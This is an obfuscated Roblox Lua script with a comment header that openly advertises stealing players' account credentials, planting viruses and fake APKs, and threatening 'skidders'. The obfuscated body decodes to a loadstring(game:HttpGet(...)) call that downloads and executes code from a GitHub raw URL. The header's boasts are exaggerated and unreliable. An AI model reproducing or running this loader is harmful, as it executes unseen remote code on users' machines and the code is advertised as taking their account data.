--[[
 ðŸ”’ LOCKED BY LX TEAM ðŸ”’
V18.12.11 [ GUARDIAN & EXEC.CMD ]

Updated protect script: 2023/01/15

-- > Note: Guardian, v21.16.9, command auto lock, give virus auto for skidders v17, skidders inform acc Roblox will saved into this script for BYPASS. < --
llcteamhelp@gmail.com for our best PROTECT auto updated by LLC Team & LX Team

Better than anything protector inmade by 50 Creator of Executor & Scripter user of top.
also have 900000000+ lines, 300000 Spy attacker hard v9, 31000 Virus Malware v13, 630000 Attacker Hard Malware v28, 759272 Attacker spy shoot v21 for your all private info.
Features LLC TEAM SINCE 2010:
ðŸ”§ Auto Take Skidder Info Roblox Account Password [ Take Username, Email, Password auto changed. ]
ðŸ”“ Auto Give Virus v17 [ The Hardware attacker for all Models Phone & PC. ]
ðŸ” Auto Save Search Roblox, Manager, Private Info all to LLC TEAM.
âŽ Fake Link [ Will show up every search if you try to open this ]
ðŸ“ Emails Collect [ Try Bypass This? Your all information private will spy by us ]
â˜ ï¸ Fake Apk Game [ Will Added In Your Files or downloaded auto ]
âš ï¸ For Bypasser this you will cannot safe, all whatever protector trash because WE ARE CAN DO ANYTHING IF YOU DO
LLC TEAM NEVER GIVE YOU AN FREEDOM AFTER BYPASS THIS, YOU WILL ENDED.

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v77=v5(v69,v19);v19=nil;return v77;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v70-(v70%1) ;else local v71=931 -(857 + 74) ;local v72;while true do if (v71==((1445 -(282 + 595)) -((2004 -(1523 + 114)) + 201))) then v72=2^(v32-(928 -(214 + 113 + 600))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -(117 -(32 + 85)))) then return (v37 * 256) + v36 ;end if (v35==(1065 -(68 + 997))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (1272 -(226 + 1024 + 20)) ;v35=4 -3 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + (3 -1) );v18=v18 + (961 -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * 65536) + (v39 * ((822 -(87 + 263)) -216)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=181 -(67 + 113 + 0) ;local v45=(v20(v43,1 + 0 ,20) * ((4 -2)^(24 + 8))) + v42 ;local v46=v20(v43,83 -(853 -(368 + 423)) ,983 -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -0)) and  -(1 + 0)) or ((3136 -2138) -(915 + 82)) ;if (v46==((18 -(10 + 8)) -0)) then if (v45==0) then return v47 * (0 + 0) ;else local v78=0;while true do if (v78==(0 -0)) then v46=1;v44=0 -0 ;break;end end end elseif (v46==2047) then return ((v45==(1187 -(1069 + 118))) and (v47 * ((2 -1)/0))) or (v47 * NaN) ;end return v8(v47,v46-((2679 -(416 + 26)) -1214) ) * (v44 + (v45/((1 + 1)^(92 -40)))) ;end local function v25(v48)local v49;if  not v48 then local v73=438 -(145 + 293) ;while true do if (v73==(430 -(44 + 386))) then v48=v23();if (v48==((0 + 0) -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + (772 -(201 + 571))) );v18=v18 + v48 ;local v50={};for v67=1 -0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(0 -0)) then v52=0;v53=nil;v51=1;end if (v51==(1275 -(388 + 886))) then v54=nil;v55=nil;v51=2;end if (v51~=(2 -0)) then else v56=nil;v57=nil;v51=1 + 2 ;end if (v51==(564 -(306 + 254))) then while true do if (v52==(1 + 2)) then v59=nil;while true do local v99=0;while true do if (v99~=1) then else if (v53==(1 -0)) then local v109=1467 -(899 + 568) ;local v110;local v111;while true do if (v109==(1 + 0)) then while true do if (v110~=(0 -0)) then else v111=0;while true do if (v111==0) then local v167=603 -(268 + 335) ;while true do if (v167~=1) then else v111=291 -(60 + 230) ;break;end if ((572 -(426 + 146))~=v167) then else v57={v54,v55,nil,v56};v58=v23();v167=812 -(569 + 242) ;end end end if (v111==1) then v59={};v53=5 -3 ;break;end end break;end end break;end if (v109~=0) then else v110=0 + 0 ;v111=nil;v109=1;end end end if (v53~=2) then else local v112=0;local v113;while true do if ((1024 -(706 + 318))==v112) then v113=1251 -(721 + 530) ;while true do if (v113==1) then for v150=1272 -(945 + 326) ,v23() do local v151=0;local v152;local v153;while true do if (v151~=(2 -1)) then else while true do if (v152==0) then v153=v21();if (v20(v153,1 + 0 ,701 -(271 + 429) )==0) then local v178=0 + 0 ;local v179;local v180;local v181;local v182;local v183;while true do if (v178==(1502 -(1408 + 92))) then v183=nil;while true do if (0==v179) then local v189=1086 -(461 + 625) ;while true do if ((1288 -(993 + 295))==v189) then v180=0;v181=nil;v189=1 + 0 ;end if (v189~=1) then else v179=1;break;end end end if (v179==(1173 -(418 + 753))) then while true do if (v180==(1 + 0)) then local v194=0;while true do if (v194~=(1 + 0)) then else v180=1 + 1 ;break;end if (v194~=(0 + 0)) then else local v201=0;while true do if (v201==(530 -(406 + 123))) then v194=1770 -(1749 + 20) ;break;end if (v201==(0 + 0)) then v183={v22(),v22(),nil,nil};if (v181==0) then local v206=0;local v207;while true do if (0==v206) then v207=0 -0 ;while true do if (v207==(0 -0)) then v183[1903 -(106 + 1794) ]=v22();v183[4]=v22();break;end end break;end end elseif (v181==1) then v183[3]=v23();elseif (v181==(1 + 1)) then v183[1 + 2 ]=v23() -((5 -3)^(43 -27)) ;elseif (v181==(117 -(4 + 110))) then local v212=584 -(57 + 527) ;local v213;while true do if (v212~=0) then else v213=1427 -(41 + 1386) ;while true do if ((103 -(17 + 86))~=v213) then else v183[3]=v23() -(2^(11 + 5)) ;v183[8 -4 ]=v22();break;end end break;end end end v201=2 -1 ;end end end end end if (v180~=(166 -(122 + 44))) then else local v195=0 -0 ;local v196;while true do if (v195~=(0 -0)) then else v196=0;while true do if (v196==1) then v180=1 + 0 ;break;end if ((0 + 0)==v196) then v181=v20(v153,3 -1 ,3);v182=v20(v153,4,71 -(30 + 35) );v196=1;end end break;end end end if (v180==3) then if (v20(v182,3,3 + 0 )==(1258 -(1043 + 214))) then v183[4]=v59[v183[15 -11 ]];end v54[v150]=v183;break;end if (2==v180) then local v198=0;while true do if (v198==0) then if (v20(v182,1213 -(323 + 889) ,1)==1) then v183[5 -3 ]=v59[v183[582 -(361 + 219) ]];end if (v20(v182,322 -(53 + 267) ,2)==(1 + 0)) then v183[416 -(15 + 398) ]=v59[v183[985 -(18 + 964) ]];end v198=3 -2 ;end if (v198~=1) then else v180=2 + 1 ;break;end end end end break;end if (1==v179) then local v190=0;while true do if (v190==(1 + 0)) then v179=2;break;end if (v190~=(850 -(20 + 830))) then else v182=nil;v183=nil;v190=1 + 0 ;end end end end break;end if (v178~=1) then else v181=nil;v182=nil;v178=2;end if (v178==0) then v179=126 -(116 + 10) ;v180=nil;v178=1 + 0 ;end end end break;end end break;end if (v151~=0) then else v152=738 -(542 + 196) ;v153=nil;v151=1;end end end v53=6 -3 ;break;end if (v113==(0 + 0)) then for v154=1,v58 do local v155=0 + 0 ;local v156;local v157;local v158;while true do if (0~=v155) then else local v173=0;local v174;while true do if ((0 + 0)==v173) then v174=0 -0 ;while true do if (v174==(2 -1)) then v155=1552 -(1126 + 425) ;break;end if ((405 -(118 + 287))==v174) then local v185=0 -0 ;while true do if (v185==0) then v156=1121 -(118 + 1003) ;v157=nil;v185=2 -1 ;end if (v185==(378 -(142 + 235))) then v174=1;break;end end end end break;end end end if (v155~=1) then else v158=nil;while true do if ((0 -0)~=v156) then else local v175=0 + 0 ;local v176;while true do if (0==v175) then v176=977 -(553 + 424) ;while true do if (v176==(1 -0)) then v156=1 + 0 ;break;end if (0==v176) then local v188=0 + 0 ;while true do if (v188==0) then v157=v21();v158=nil;v188=1 + 0 ;end if ((1 + 0)~=v188) then else v176=1 + 0 ;break;end end end end break;end end end if (v156==(2 -1)) then if (v157==(2 -1)) then v158=v21()~=(0 -0) ;elseif (v157==2) then v158=v24();elseif (v157==3) then v158=v25();end v59[v154]=v158;break;end end break;end end end v57[1 + 2 ]=v21();v113=1;end end break;end end end break;end if (v99==0) then local v107=0;local v108;while true do if (0~=v107) then else v108=0;while true do if (0~=v108) then else local v114=0 -0 ;while true do if ((753 -(239 + 514))~=v114) then else if (v53~=0) then else local v168=0;local v169;local v170;while true do if ((1 + 0)==v168) then while true do if (v169~=(1329 -(797 + 532))) then else v170=0 + 0 ;while true do if (v170==(0 + 0)) then local v186=0;while true do if (v186==0) then local v191=0 -0 ;while true do if (v191==(1202 -(373 + 829))) then v54={};v55={};v191=1;end if (v191==1) then v186=732 -(476 + 255) ;break;end end end if (v186~=1) then else v170=1131 -(369 + 761) ;break;end end end if (v170~=1) then else v56={};v53=1;break;end end break;end end break;end if (v168==(0 + 0)) then v169=0;v170=nil;v168=1 -0 ;end end end if (v53~=3) then else local v171=0;local v172;while true do if (v171~=0) then else v172=0 -0 ;while true do if (v172~=0) then else local v184=238 -(64 + 174) ;while true do if (v184==0) then local v187=0 + 0 ;while true do if (v187~=(0 -0)) then else for v192=1,v23() do v55[v192-1 ]=v28();end return v57;end end end end end end break;end end end v114=337 -(144 + 192) ;end if (v114==(217 -(42 + 174))) then v108=1 + 0 ;break;end end end if (v108==1) then v99=1;break;end end break;end end end end end break;end if (v52~=0) then else local v95=0;while true do if (v95~=0) then else v53=0 + 0 ;v54=nil;v95=1;end if (v95==1) then v52=1 + 0 ;break;end end end if (1~=v52) then else local v96=1504 -(363 + 1141) ;local v97;while true do if (v96==(1580 -(1183 + 397))) then v97=0 -0 ;while true do if (v97==(1 + 0)) then v52=2;break;end if (v97==(0 + 0)) then v55=nil;v56=nil;v97=1976 -(1913 + 62) ;end end break;end end end if (v52==(2 + 0)) then local v98=0 -0 ;while true do if (v98~=(1934 -(565 + 1368))) then else v52=11 -8 ;break;end if (v98~=(1661 -(1477 + 184))) then else local v106=0;while true do if (v106==0) then v57=nil;v58=nil;v106=1 -0 ;end if (v106==(1 + 0)) then v98=1;break;end end end end end end break;end if (v51==3) then v58=nil;v59=nil;v51=860 -(564 + 292) ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=6) then if (v92<=2) then if (v92<=0) then v89[v91[2]]();elseif (v92>1) then v89[v91[2]]=v91[3];else local v117=0;local v118;while true do if (v117==0) then v118=v91[2];v89[v118]=v89[v118](v13(v89,v118 + 1 ,v84));break;end end end elseif (v92<=4) then if (v92>3) then v89[v91[2]]=v62[v91[3]];else local v121=v91[2];local v122=v89[v91[3]];v89[v121 + 1 ]=v122;v89[v121]=v122[v91[4]];end elseif (v92>5) then local v126=0;local v127;local v128;local v129;local v130;while true do if (v126==1) then v84=(v129 + v127) -1 ;v130=0;v126=2;end if (v126==2) then for v164=v127,v84 do v130=v130 + 1 ;v89[v164]=v128[v130];end break;end if (v126==0) then v127=v91[2];v128,v129=v82(v89[v127](v13(v89,v127 + 1 ,v91[3])));v126=1;end end else v89[v91[2]]();end elseif (v92<=9) then if (v92<=7) then do return;end elseif (v92>8) then local v131=v91[2];local v132=v89[v91[3]];v89[v131 + 1 ]=v132;v89[v131]=v132[v91[4]];else local v136=0;local v137;while true do if (v136==0) then v137=v91[2];v89[v137]=v89[v137](v13(v89,v137 + 1 ,v84));break;end end end elseif (v92<=11) then if (v92==10) then do return;end else local v138=v91[2];local v139,v140=v82(v89[v138](v13(v89,v138 + 1 ,v91[3])));v84=(v140 + v138) -1 ;local v141=0;for v146=v138,v84 do v141=v141 + 1 ;v89[v146]=v139[v141];end end elseif (v92>12) then v89[v91[2]]=v62[v91[3]];else v89[v91[2]]=v91[3];end v83=v83 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403AE3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F2O4C437465616D732F5A4B4875622F6D61696E2F254430254231254430252O4225443025424525443025424125443025424325443025423025443025424425323025443125383125443125383225443025423025443125383025443025424525443025423925323025443025423225443025423525443125383025443125383125443025423825443025423800083O0012043O00013O001204000100023O002003000100010003001202000300044O000B000100034O00085O00022O00053O000100012O00073O00017O00",v9(),...);end
